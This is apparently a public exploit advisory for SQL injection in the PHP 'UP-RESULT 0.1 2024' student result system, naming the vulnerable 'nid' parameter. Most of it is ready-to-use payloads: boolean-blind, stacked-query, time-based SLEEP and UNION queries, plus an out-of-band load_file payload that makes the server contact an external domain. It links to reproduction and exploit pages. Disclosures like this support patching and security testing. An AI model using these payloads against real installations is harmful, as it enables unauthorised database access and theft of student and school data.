Headline
UP-RESULT 0.1 2024 SQL Injection
UP-RESULT version 0.1 2024 suffers from a remote SQL injection vulnerability.
## Title: upresult_0.1-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 04/08/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The nid parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'was submitted in the nid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: nid=145448807' or '1766'='1766' UNION ALL SELECTNULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)## Time spent:00:15:00